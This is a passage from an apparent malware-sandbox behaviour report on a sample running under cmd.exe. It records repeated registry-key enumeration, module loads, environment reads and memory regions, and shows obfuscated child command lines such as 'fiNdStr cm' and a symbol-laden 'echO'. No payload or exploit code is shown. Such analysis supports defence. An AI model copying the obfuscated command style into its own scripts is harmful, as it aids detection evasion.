| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 |
Module (10)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | ADVAPI32.dll | base_address = 0x7feff0e0000 |
|
1 | |
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e40000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77b20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x77b323d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77b28290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x77b317e0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumKeyW, address_out = 0x7feff0fbf20 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-06 08:01:16 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 125518 |
|
1 |
Environment (9)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
3 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 |
Process #10: findstr.exe
0
0
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\windows\system32\findstr.exe |
| Command Line | fiNdStr cm |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:57, Reason: Child Process |
| Unmonitor | End Time: 00:00:59, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb68 |
| Parent PID | 0xb58 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B6C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x00044fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| findstr.exe | 0xff930000 | 0xff945fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Process #11: cmd.exe
51
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /S /D /c" echO ,%*[-,% " |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:58, Reason: Child Process |
| Unmonitor | End Time: 00:00:59, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb70 |
| Parent PID | 0xb50 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B74
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x00044fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00041fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001b0000 | 0x00216fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0042ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0052ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000530000 | 0x00530000 | 0x006b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006c0000 | 0x006c0000 | 0x00840fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x01c4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c50000 | 0x01c50000 | 0x01f92fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001fa0000 | 0x01fa0000 | 0x0209ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x49e40000 | 0x49e98fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fee69d0000 | 0x7fee69d7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd3fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (12)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
6 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 1095 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e40000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77b20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x77b323d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77b28290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x77b317e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-06 08:01:17 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 125939 |
|
1 |
Environment (10)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
3 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
